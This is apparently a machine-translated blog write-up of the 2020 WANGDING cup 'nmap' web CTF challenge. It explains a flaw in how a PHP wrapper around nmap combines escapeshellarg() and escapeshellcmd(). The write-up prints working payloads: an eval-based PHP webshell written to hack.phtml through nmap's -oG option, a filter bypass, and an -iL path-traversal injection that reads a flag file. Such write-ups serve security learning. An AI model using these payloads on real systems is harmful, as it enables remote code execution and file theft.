当前位置:网站首页>2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2022-07-06 11:32:00 【Her&mes】
WP
Two inspection points
1. Investigate nmap Use
2. Investigate escapeshellarg() And escapeshellcmd() Mixed use vulnerability
The first one is OK to say , The title tells
The second point , I do not know! , I don't know where I got it , Autistic ing
Look at other masters wp, Referred to the [BUUCTF 2018]Online Tool, A code audit question , It directly tells the parameter process escapeshellarg() And escapeshellcmd() Handle
The two questions cannot be said to be the same , Can only say exactly the same .
nmap Use output related parameters
stay nmap Chinese net The following results can be found in :
-oN ( standard output )
-oX (XML Output )
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep Output )
-oA ( Output to all formats )
There are other miscellaneous outputs , You can check it out , Here we use -oG structure payload
payload The subject is
<?php @eval($_POST["hack"]);?> -oG hack.php
However, echo after sending hacker word
There's a filter , Conduct fuzz test ,php The filtered , however phtml No, , And use php The short label of can replace <?php, That is to say :
<?= @eval($_POST["hack"]);?> -oG hack.phtml
Not yet here , In this way parload after escapeshellarg() And escapeshellcmd() Function processing , Can't generate files
The solution is simple , Just add spaces and single quotes , In this way, it can produce a normal parsing php file
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
The specific principle is written by the boss PHP escapeshellarg()+escapeshellcmd() Regression of
stay CSDN There are other masters' writings on escapeshellarg() And escapeshellcmd() Analysis of , simple
Except for writing webshell, There are also direct reading methods , Take advantage of -iL Parameters
' -iL ../../../../flag -o a '
Direct access a Just go , The following can also be done , But to visit a’
' -iL ../../../../flag -o a
The reason is also those two functions .
边栏推荐
- 4、安装部署Spark(Spark on Yarn模式)
- L2-004 is this a binary search tree? (25 points)
- Punctual atom stm32f103zet6 download serial port pin
- 机器学习--人口普查数据分析
- ES6 Promise 对象
- Codeforces Round #771 (Div. 2)
- MTCNN人脸检测
- Valentine's Day flirting with girls to force a small way, one can learn
- 【kerberos】深入理解kerberos票据生命周期
- [Bluebridge cup 2021 preliminary] weight weighing
猜你喜欢
Image recognition - pyteseract TesseractNotFoundError: tesseract is not installed or it‘s not in your path
QT creator test
Why can't I use the @test annotation after introducing JUnit
Vs2019 desktop app quick start
Double to int precision loss
Cookie setting three-day secret free login (run tutorial)
Valentine's Day flirting with girls to force a small way, one can learn
软件测试与质量学习笔记3--白盒测试
Word排版(小计)
【flink】flink学习
随机推荐
{一周总结}带你走进js知识的海洋
QT creator design user interface
Tcp/ip protocol (UDP)
小L的试卷
Vs2019 use wizard to generate an MFC Application
库函数--(持续更新)
error C4996: ‘strcpy‘: This function or variable may be unsafe. Consider using strcpy_s instead
jS数组+数组方法重构
數據庫高級學習筆記--SQL語句
[download app for free]ineukernel OCR image data recognition and acquisition principle and product application
Base de données Advanced Learning Notes - - SQL statements
分布式节点免密登录
Rhcsa certification exam exercise (configured on the first host)
Vs2019 first MFC Application
vs2019 第一个MFC应用程序
PHP - whether the setting error displays -php xxx When PHP executes, there is no code exception prompt
Codeforces Round #753 (Div. 3)
Library function -- (continuous update)
L2-004 这是二叉搜索树吗? (25 分)
L2-007 family real estate (25 points)